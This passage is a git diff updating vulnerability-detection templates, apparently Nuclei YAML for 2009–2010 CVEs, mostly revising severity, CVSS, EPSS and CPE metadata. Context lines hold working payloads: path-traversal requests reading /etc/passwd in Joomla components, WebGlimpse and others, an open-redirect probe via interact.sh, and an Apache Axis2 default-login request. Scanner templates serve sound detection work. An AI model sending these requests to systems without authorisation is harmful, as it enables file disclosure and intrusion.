cpe:2.3:a:zeroshell:zeroshell:1.0:beta1:*:*:*:*:*:* metadata: max-request: 1 + vendor: zeroshell + product: zeroshell + tags: edb,cve,cve2009,zeroshell,kerbynet,rce http: - method: GET diff --git a/http/cves/2009/CVE-2009-0932.yaml b/http/cves/2009/CVE-2009-0932.yaml index d5973114b7..14eae6c598 100644 --- a/http/cves/2009/CVE-2009-0932.yaml +++ b/http/cves/2009/CVE-2009-0932.yaml @@ -3,21 +3,26 @@ id: CVE-2009-0932 info: name: Horde/Horde Groupware - Local File Inclusion author: pikpikcu - severity: high + severity: medium description: Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 are susceptible to local file inclusion in framework/Image/Image.php because it allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name. reference: - https://www.exploit-db.com/exploits/16154 - http://cvs.horde.org/co.php/groupware/docs/groupware/CHANGES?r=1.28.2.5 - - http://web.archive.org/web/20161228102217/http://secunia.com/advisories/33695 - https://nvd.nist.gov/vuln/detail/CVE-2009-0932?cpeVersion=2.2 + - http://cvs.horde.org/co.php/horde/docs/CHANGES?r=1.515.2.413.2.5 + - http://cvs.horde.org/co.php/horde/docs/CHANGES?r=1.515.2.503 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N + cvss-score: 6.4 cve-id: CVE-2009-0932 cwe-id: CWE-22 - tags: cve,cve2009,horde,lfi,traversal,edb + epss-score: 0.04048 + cpe: cpe:2.3:a:debian:horde:3.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: debian + product: horde + tags: cve,cve2009,horde,lfi,traversal,edb http: - method: GET @@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml index 484fb306b4..7aa75206ad 100644 --- a/http/cves/2009/CVE-2009-1151.yaml +++ b/http/cves/2009/CVE-2009-1151.yaml @@ -3,7 +3,7 @@ id: CVE-2009-1151 info: name: PhpMyAdmin Scripts - Remote Code Execution author: princechaddha - severity: critical + severity: high description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. reference: - https://www.phpmyadmin.net/security/PMASA-2009-3/ @@ -12,13 +12,17 @@ info: - http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php - https://nvd.nist.gov/vuln/detail/CVE-2009-1151 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2009-1151 - cwe-id: CWE-77 - tags: deserialization,kev,vulhub,cve,cve2009,phpmyadmin,rce + cwe-id: CWE-94 + epss-score: 0.79256 + cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: phpmyadmin + product: phpmyadmin + tags: deserialization,kev,vulhub,cve,cve2009,phpmyadmin,rce http: - raw: @@ -33,10 +37,10 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: regex regex: - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/http/cves/2009/CVE-2009-1496.yaml b/http/cves/2009/CVE-2009-1496.yaml index aaaa086510..7529af81a6 100644 --- a/http/cves/2009/CVE-2009-1496.yaml +++ b/http/cves/2009/CVE-2009-1496.yaml @@ -3,21 +3,24 @@ id: CVE-2009-1496 info: name: Joomla! Cmimarketplace 0.1 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: | Joomla! Cmimarketplace 0.1 is susceptible to local file inclusion because com_cmimarketplace allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php. reference: - https://www.exploit-db.com/exploits/8367 - - http://web.archive.org/web/20210121190149/https://www.securityfocus.com/bid/34431/ - https://nvd.nist.gov/vuln/detail/CVE-2009-1496 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2009-1496 cwe-id: CWE-22 - tags: joomla,lfi,edb,cve,cve2009 + epss-score: 0.00533 + cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla + product: joomla + tags: joomla,lfi,edb,cve,cve2009 http: - method: GET @@ -26,7 +29,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2009/CVE-2009-1558.yaml b/http/cves/2009/CVE-2009-1558.yaml index 5ac76beb15..1252fd6466 100644 --- a/http/cves/2009/CVE-2009-1558.yaml +++ b/http/cves/2009/CVE-2009-1558.yaml @@ -7,18 +7,22 @@ info: description: Cisco Linksys WVC54GCA 1.00R22/1.00R24 is susceptible to local file inclusion in adm/file.cgi because it allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter. reference: - https://www.exploit-db.com/exploits/32954 - - https://web.archive.org/web/20210119151410/http://www.securityfocus.com/bid/34713 - http://www.vupen.com/english/advisories/2009/1173 - http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/ - https://nvd.nist.gov/vuln/detail/CVE-2009-1558 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/50231 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N + cvss-score: 7.8 cve-id: CVE-2009-1558 cwe-id: CWE-22 - tags: cve,iot,linksys,camera,traversal,cve2009,lfi,cisco,firmware,edb + epss-score: 0.00901 + cpe: cpe:2.3:h:cisco:wvc54gca:1.00r22:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cisco + product: wvc54gca + tags: cve,iot,linksys,camera,traversal,cve2009,lfi,cisco,firmware,edb http: - method: GET diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml index 46f331128e..7d94fa369a 100644 --- a/http/cves/2009/CVE-2009-1872.yaml +++ b/http/cves/2009/CVE-2009-1872.yaml @@ -6,20 +6,23 @@ info: severity: medium description: Adobe ColdFusion Server 8.0.1 and earlier contain multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm. reference: - - https://web.archive.org/web/20201208121904/https://www.securityfocus.com/archive/1/505803/100/0/threaded - https://www.tenable.com/cve/CVE-2009-1872 - http://www.adobe.com/support/security/bulletins/apsb09-12.html - http://www.dsecrg.com/pages/vul/show.php?id=122 - https://nvd.nist.gov/vuln/detail/CVE-2009-1872 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2009-1872 cwe-id: CWE-79 - cvss-score: 4.3 + epss-score: 0.3657 + cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.component:"Adobe ColdFusion" verified: true + vendor: adobe + product: coldfusion tags: cve,cve2009,adobe,xss,coldfusion,tenable http: @@ -30,9 +33,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2009/CVE-2009-2015.yaml b/http/cves/2009/CVE-2009-2015.yaml index 31e65b4bdf..6b84b86d27 100644 --- a/http/cves/2009/CVE-2009-2015.yaml +++ b/http/cves/2009/CVE-2009-2015.yaml @@ -7,17 +7,20 @@ info: description: Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion). reference: - https://www.exploit-db.com/exploits/8898 - - http://web.archive.org/web/20210121191105/https://www.securityfocus.com/bid/35259/ - http://www.vupen.com/english/advisories/2009/1530 - https://nvd.nist.gov/vuln/detail/CVE-2009-2015 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2009-2015 cwe-id: CWE-22 - tags: joomla,lfi,edb,cve,cve2009 + epss-score: 0.00813 + cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla + product: joomla + tags: joomla,lfi,edb,cve,cve2009 http: - method: GET @@ -26,7 +29,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml index dbfbe32432..1c3fa42ae0 100644 --- a/http/cves/2009/CVE-2009-2100.yaml +++ b/http/cves/2009/CVE-2009-2100.yaml @@ -3,21 +3,23 @@ id: CVE-2009-2100 info: name: Joomla! JoomlaPraise Projectfork 2.0.10 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: Joomla! JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php. reference: - https://www.exploit-db.com/exploits/8946 - - http://web.archive.org/web/20210121191226/https://www.securityfocus.com/bid/35378/ - https://nvd.nist.gov/vuln/detail/CVE-2009-2100 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2009-2100 cwe-id: CWE-22 - tags: cve,cve2009,joomla,lfi,edb + epss-score: 0.00528 + cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla + product: joomla + tags: cve,cve2009,joomla,lfi,edb http: - method: GET @@ -26,7 +28,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2009/CVE-2009-3053.yaml b/http/cves/2009/CVE-2009-3053.yaml index a5acdedd1c..41261d1df7 100644 --- a/http/cves/2009/CVE-2009-3053.yaml +++ b/http/cves/2009/CVE-2009-3053.yaml @@ -3,21 +3,25 @@ id: CVE-2009-3053 info: name: Joomla! Agora 3.0.0b - Local File Inclusion author: daffainfo - severity: high + severity: medium description: Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php. reference: - https://www.exploit-db.com/exploits/9564 - - https://web.archive.org/web/20210120183330/https://www.securityfocus.com/bid/36207/ - https://exchange.xforce.ibmcloud.com/vulnerabilities/52964 - https://nvd.nist.gov/vuln/detail/CVE-2009-3053 + - http://www.exploit-db.com/exploits/9564 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P + cvss-score: 6.8 cve-id: CVE-2009-3053 cwe-id: CWE-22 - tags: cve,cve2009,joomla,lfi,edb + epss-score: 0.00367 + cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla + product: joomla + tags: cve,cve2009,joomla,lfi,edb http: - method: GET @@ -26,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml index 42bff805dc..69a50e0646 100644 --- a/http/cves/2009/CVE-2009-3318.yaml +++ b/http/cves/2009/CVE-2009-3318.yaml @@ -8,16 +8,19 @@ info: reference: - https://www.exploit-db.com/exploits/9706 - https://nvd.nist.gov/vuln/detail/CVE-2009-3318 - - https://web.archive.org/web/20210121192413/https://www.securityfocus.com/bid/36441/ - http://www.exploit-db.com/exploits/9706 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2009-3318 cwe-id: CWE-22 - cvss-score: 7.5 - tags: joomla,lfi,edb,cve,cve2009 + epss-score: 0.00706 + cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla + product: joomla + tags: joomla,lfi,edb,cve,cve2009 http: - method: GET @@ -26,7 +29,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml index 4506d120b6..a0fca2b616 100644 --- a/http/cves/2009/CVE-2009-4202.yaml +++ b/http/cves/2009/CVE-2009-4202.yaml @@ -9,15 +9,19 @@ info: - https://www.exploit-db.com/exploits/8870 - http://www.vupen.com/english/advisories/2009/1494 - https://nvd.nist.gov/vuln/detail/CVE-2009-4202 - - http://web.archive.org/web/20210121191031/https://www.securityfocus.com/bid/35201/ + - http://www.exploit-db.com/exploits/8870 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2009-4202 cwe-id: CWE-22 - tags: cve2009,joomla,lfi,photo,edb,cve + epss-score: 0.01956 + cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla + product: joomla\! + tags: cve2009,joomla,lfi,photo,edb,cve http: - method: GET @@ -26,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2009/CVE-2009-4223.yaml b/http/cves/2009/CVE-2009-4223.yaml index 75b90a2844..72142f903b 100644 --- a/http/cves/2009/CVE-2009-4223.yaml +++ b/http/cves/2009/CVE-2009-4223.yaml @@ -13,12 +13,16 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2009-4223 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2009-4223 cwe-id: CWE-94 - cvss-score: 7.5 - tags: cve,cve2009,krweb,rfi,edb + epss-score: 0.01041 + cpe: cpe:2.3:a:gianni_tommasi:kr-php_web_content_server:*:beta_2:*:*:*:*:*:* metadata: max-request: 1 + vendor: gianni_tommasi + product: kr-php_web_content_server + tags: cve,cve2009,krweb,rfi,edb http: - method: GET @@ -27,10 +31,11 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: word part: interactsh_protocol words: - "http" + + - type: status + status: + - 200 diff --git a/http/cves/2009/CVE-2009-4679.yaml b/http/cves/2009/CVE-2009-4679.yaml index d48847253f..db07ceb35c 100644 --- a/http/cves/2009/CVE-2009-4679.yaml +++ b/http/cves/2009/CVE-2009-4679.yaml @@ -13,12 +13,16 @@ info: - http://www.exploit-db.com/exploits/10754 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2009-4679 cwe-id: CWE-22 - cvss-score: 7.5 - tags: cve,cve2009,joomla,lfi,nexus,edb + epss-score: 0.00826 + cpe: cpe:2.3:a:inertialfate:com_if_nexus:1.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: inertialfate + product: com_if_nexus + tags: cve,cve2009,joomla,lfi,nexus,edb http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2009/CVE-2009-5020.yaml b/http/cves/2009/CVE-2009-5020.yaml index 9e2b35ad95..b544b386e4 100644 --- a/http/cves/2009/CVE-2009-5020.yaml +++ b/http/cves/2009/CVE-2009-5020.yaml @@ -10,19 +10,24 @@ info: - http://awstats.sourceforge.net/docs/awstats_changelog.txt remediation: Apply all relevant security patches and product upgrades. classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:P + cvss-score: 5.8 cve-id: CVE-2009-5020 - cwe-id: CWE-601 - tags: cve,cve2009,redirect,awstats + cwe-id: CWE-20 + epss-score: 0.00215 + cpe: cpe:2.3:a:awstats:awstats:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: awstats + product: awstats + tags: cve,cve2009,redirect,awstats http: - method: GET path: - '{{BaseURL}}/awstats/awredir.pl?url=interact.sh' - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=interact.sh' + stop-at-first-match: true matchers: - type: regex diff --git a/http/cves/2009/CVE-2009-5114.yaml b/http/cves/2009/CVE-2009-5114.yaml index 3ff0aa3991..94bc2f0b89 100644 --- a/http/cves/2009/CVE-2009-5114.yaml +++ b/http/cves/2009/CVE-2009-5114.yaml @@ -3,7 +3,7 @@ id: CVE-2009-5114 info: name: WebGlimpse 2.18.7 - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter. reference: - https://www.exploit-db.com/exploits/36994 @@ -13,22 +13,28 @@ info: remediation: Apply all relevant security patches and product upgrades. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2009-5114 cwe-id: CWE-22 - cvss-score: 5.0 - tags: edb,cve,cve2009,lfi + epss-score: 0.03309 + cpe: cpe:2.3:a:iwork:webglimpse:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: iwork + product: webglimpse + tags: edb,cve,cve2009,lfi http: - method: GET path: - "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml index 1edfaf4565..3a946db7fa 100644 --- a/http/cves/2010/CVE-2010-0157.yaml +++ b/http/cves/2010/CVE-2010-0157.yaml @@ -13,22 +13,28 @@ info: remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2010-0157 cwe-id: CWE-22 - cvss-score: 7.5 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.00826 + cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla + product: joomla\! + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET path: - "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-0219.yaml b/http/cves/2010/CVE-2010-0219.yaml index 0314758766..ae453080bf 100644 --- a/http/cves/2010/CVE-2010-0219.yaml +++ b/http/cves/2010/CVE-2010-0219.yaml @@ -3,21 +3,26 @@ id: CVE-2010-0219 info: name: Apache Axis2 Default Login author: pikpikcu - severity: high + severity: critical description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service. reference: - https://nvd.nist.gov/vuln/detail/CVE-2010-0219 - https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html - http://www.rapid7.com/security-center/advisories/R7-0037.jsp - http://www.vupen.com/english/advisories/2010/2673 + - http://retrogod.altervista.org/9sg_ca_d2d.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C cvss-score: 10 cve-id: CVE-2010-0219 cwe-id: CWE-255 + epss-score: 0.97497 + cpe: cpe:2.3:a:apache:axis2:1.3:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.html:"Apache Axis" + vendor: apache + product: axis2 tags: cve,cve2010,axis,apache,default-login,axis2 http: @@ -28,7 +33,6 @@ http: Content-Type: application/x-www-form-urlencoded loginUsername={{username}}&loginPassword={{password}} - - | POST /axis2/axis2-admin/login HTTP/1.1 Host: {{Hostname}} @@ -45,7 +49,6 @@ http: matchers-condition: and matchers: - - type: word words: - "

Welcome to Axis2 Web Admin Module !!

" diff --git a/http/cves/2010/CVE-2010-0467.yaml b/http/cves/2010/CVE-2010-0467.yaml index fed288fa12..ef613e1a62 100644 --- a/http/cves/2010/CVE-2010-0467.yaml +++ b/http/cves/2010/CVE-2010-0467.yaml @@ -8,8 +8,9 @@ info: reference: - https://www.exploit-db.com/exploits/11282 - https://nvd.nist.gov/vuln/detail/CVE-2010-0467 - - http://web.archive.org/web/20210121194037/https://www.securityfocus.com/bid/37987/ - http://www.chillcreations.com/en/blog/ccnewsletter-joomla-newsletter/ccnewsletter-106-security-release.html + - http://www.exploit-db.com/exploits/11277 + - http://www.exploit-db.com/exploits/11282 remediation: Apply all relevant security patches and upgrades. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N @@ -17,19 +18,24 @@ info: cve-id: CVE-2010-0467 cwe-id: CWE-22 epss-score: 0.0586 - tags: cve,cve2010,joomla,lfi,edb + cpe: cpe:2.3:a:chillcreations:com_ccnewsletter:1.0.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: chillcreations + product: com_ccnewsletter + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-0696.yaml b/http/cves/2010/CVE-2010-0696.yaml index 8c5952373a..87dc67e493 100644 --- a/http/cves/2010/CVE-2010-0696.yaml +++ b/http/cves/2010/CVE-2010-0696.yaml @@ -3,32 +3,38 @@ id: CVE-2010-0696 info: name: Joomla! Component Jw_allVideos - Arbitrary File Retrieval author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter. reference: - https://www.exploit-db.com/exploits/11447 - https://nvd.nist.gov/vuln/detail/CVE-2010-0696 - - http://web.archive.org/web/20140805102632/http://secunia.com/advisories/38587/ - http://www.joomlaworks.gr/content/view/77/34/ + - http://www.exploit-db.com/exploits/11447 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-0696 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.79015 + cpe: cpe:2.3:a:joomlaworks:jw_allvideos:3.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlaworks + product: jw_allvideos + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-0759.yaml b/http/cves/2010/CVE-2010-0759.yaml index e9add73331..68d8a5149c 100644 --- a/http/cves/2010/CVE-2010-0759.yaml +++ b/http/cves/2010/CVE-2010-0759.yaml @@ -8,27 +8,33 @@ info: reference: - https://www.exploit-db.com/exploits/11498 - https://nvd.nist.gov/vuln/detail/CVE-2010-0759 - - http://web.archive.org/web/20151104183037/http://secunia.com/advisories/38637/ - - http://web.archive.org/web/20210121194344/https://www.securityfocus.com/bid/38296/ + - http://www.exploit-db.com/exploits/11498 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/56380 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-0759 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,plugin,edb + epss-score: 0.01326 + cpe: cpe:2.3:a:greatjoomla:scriptegrator_plugin:1.4.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: greatjoomla + product: scriptegrator_plugin + tags: cve,cve2010,joomla,lfi,plugin,edb http: - method: GET path: - "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml index ca34393aa0..3ae5c45be1 100644 --- a/http/cves/2010/CVE-2010-0942.yaml +++ b/http/cves/2010/CVE-2010-0942.yaml @@ -3,31 +3,38 @@ id: CVE-2010-0942 info: name: Joomla! Component com_jvideodirect - Directory Traversal author: daffainfo - severity: high + severity: medium description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11089 - https://nvd.nist.gov/vuln/detail/CVE-2010-0942 - http://packetstormsecurity.org/1001-exploits/joomlajvideodirect-traversal.txt + - https://exchange.xforce.ibmcloud.com/vulnerabilities/55513 remediation: Apply all relevant security patches and product upgrades. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-0942 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,packetstorm,cve + epss-score: 0.00477 + cpe: cpe:2.3:a:jvideodirect:com_jvideodirect:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: jvideodirect + product: com_jvideodirect + tags: cve2010,joomla,lfi,edb,packetstorm,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-0943.yaml b/http/cves/2010/CVE-2010-0943.yaml index 8f1e936be0..deed2da1ad 100644 --- a/http/cves/2010/CVE-2010-0943.yaml +++ b/http/cves/2010/CVE-2010-0943.yaml @@ -3,31 +3,36 @@ id: CVE-2010-0943 info: name: Joomla! Component com_jashowcase - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php. reference: - https://www.exploit-db.com/exploits/11090 - https://nvd.nist.gov/vuln/detail/CVE-2010-0943 - - http://web.archive.org/web/20210121193737/https://www.securityfocus.com/bid/37692/ - - http://web.archive.org/web/20140724215426/http://secunia.com/advisories/33486/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/55512 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-0943 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,cve + epss-score: 0.01155 + cpe: cpe:2.3:a:joomlart:com_jashowcase:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlart + product: com_jashowcase + tags: cve2010,joomla,lfi,edb,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-0944.yaml b/http/cves/2010/CVE-2010-0944.yaml index 29613823cd..b021b60f4d 100644 --- a/http/cves/2010/CVE-2010-0944.yaml +++ b/http/cves/2010/CVE-2010-0944.yaml @@ -3,32 +3,39 @@ id: CVE-2010-0944 info: name: Joomla! Component com_jcollection - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11088 - https://nvd.nist.gov/vuln/detail/CVE-2010-0944 - http://packetstormsecurity.org/1001-exploits/joomlajcollection-traversal.txt - http://www.exploit-db.com/exploits/11088 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/55514 remediation: Apply all relevant security patches and product upgrades. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-0944 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,packetstorm,cve + epss-score: 0.00477 + cpe: cpe:2.3:a:thorsten_riess:com_jcollection:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: thorsten_riess + product: com_jcollection + tags: cve2010,joomla,lfi,edb,packetstorm,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-0972.yaml 